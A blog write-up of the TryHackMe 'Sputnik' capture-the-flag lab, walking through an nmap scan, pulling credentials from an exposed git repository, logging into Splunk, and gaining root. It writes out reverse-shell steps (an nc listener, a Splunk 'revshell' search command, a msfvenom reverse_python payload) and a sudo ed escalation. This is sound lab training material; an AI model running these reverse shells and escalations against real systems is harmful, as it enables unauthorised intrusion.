Planet DesKel

DesKel's official page for CTF write-up, Electronic tutorial, review and etc.

Arduino
Backdoor Challenge Land CTFLearn CyberEDU Webhacking.kr TryHackMe, THM Short CTF
Hacking Tools
Donate
10 August 2020

THM write-up: Sputnik

6 minutes to read

titlecard

Link: https://tryhackme.com/room/sputnik

Greeting there, today we are going for another tryhackme CTF challenge. This room is ported by user DarkStar7471 from VulnHub. For your information, the Vulnhub is training ground for CTF challenger or a place to sharpen your pentesting skill. This challenge required basic knowledge of the git command and Splunk. If you are new to git, this article and cheat sheet might help you out. Let’s start the walkthrough, shall we?

Task 1: Capture the flag

Your task is to capture the root flag. That’s all.

Task 1-1: Secret?

First off, we are going to launch the Nmap scanner using the following command.

nmap -Pn -p- -A -v <MACHINE IP>

nmap

more nmap

There a total of 4 open ports available on the machine which is Port 8089 (HTTPS), 8191 (Mongo dB), 55555 (HTTP), and 61337 (HTTP).

1) Port 8089

http

A Splunk atom feed that required a login credential. Skip it.

2) Port 55555

flappy

Ah, what a lovely raging game. By referring to the Nmap scanner, there are a .git directory hidden within port 55555.

git

Look like an exposed git directory. Please refer to this article for more information. After that download the git file into your machine using the following command.

wget -r http://<Machine IP>:55555/.git

We are going to enumerate the entire git folder. Let’s check with the stat using ‘git status’.

enumerate git

We got four deleted files. Also, you can check the deleted content using ‘git diff’ status

delete git

Nothing out of ordinary at all. Next, check for the hidden files inside the branches using ‘git branch’.

branch git

Nope, nothing inside. We have checked the file status inside the git. How about history? Use ‘git log’.

git log

Well, reading this log entry raise suspicion. We are going to revert back the git to commit id 07fda135aae22fa7869b3de9e450ff7cacfbc717 using **‘git reset –hard '** .

git reset

Error? Huh… I guess this git is not originated from this server. Let enumerate what is inside the folder.

origin

Checking the origin file inside the .git/logs/refs/remotes give us an idea. This git is originally from https://github.com/ameerpornillos/flappy.git. Without further ado, let’s clone the git repo and revert the commit.

message

A secret file leaves us the following message.

sputnik:ameer_says_thank_you_and_good_job

Let’s search for more clue about this file by reverting it to the id where the file getting an update.

update

Wrong info? I guess this file contains a piece of important information. Login credential perhaps? Also, We haven’t discovered the port 61337 yet.

Task 1-2: Capture the root flag

1) Port 61337

splunk

A Splunk server login page eh. Gonna try the credential (user: sputnik, password: ameer_says_thank_you_and_good_job).

server

Oops, we accidentally login into the server and we have admin privilege for the server too. To access to the machine, we need to generate a reverse shell. This article providing a full guide on exploiting using the Splunk shell, worth a read. First off, download the Splunk shell from this website and go to search and report.

search report

At the top bar, click the App: Search & Reporting and select manage Apps.

manage apps

We are going to install the app from file at the top right. Then, upload the tar.gz file we just downloaded.

install

upload

After that, restart the Splunk server.

restart

Login to the server again, we have the apps inside the server.

apps

Then, select the radio button to All apps and save it.

all apps

Fire up your Netcat listener in your own machine using the following command

nc -lvnp 4444

Go back the search & reporting and enter the following command on Splunk search field. Make sure you use your own tunnel IP.

| revshell std <Tunnel IP> 4444

search again

tunnel

2) Spawn a TTY shell

shell

Ta-da, we are now inside the victim machine. Time to capture the root’s flag. This shell looks a bit ‘dirty’, how about spawn a shell using the Python?

python -c 'import pty; pty.spawn("/bin/sh")'

spawn shell

Weird!, we can’t spawn a shell using python inside the session. After googling and researching, I come across this article. We are now going to use msfvenom to spawn a shell from a shell, what a ‘shellception’. We are going to use port 2222 for the second shell.

msfvenom -p cmd/unix/reverse_python LHOST=<Tunnel IP> LPORT=2222 R

msfvenom

3) Capture the flag

Launch another Netcat with port 2222 and copy the payload to the first shell.

more shell

We are now able to spawn a TTY shell inside the machine. Let’s check what can we do with the sudo command.

sudo

We can run ‘ed’ command inside the machine using sudo command. Checking the ed command from GTFObin give us an answer.

ed

root

Congratulation, you are now rooted in the machine.Time for the flag.

Conclusion

That’s all for the Sputnik boot2root CTF challenge. Hope you enjoy the walkthrough. until nex time ;)

tags: tryhackme - CTF - recon - privilege_escalate - reverse_shell

Thanks for reading. Follow my twitter for latest update

If you like this post, consider a small donation. Much appreciated. :)

Vortex

© 2020 DesKel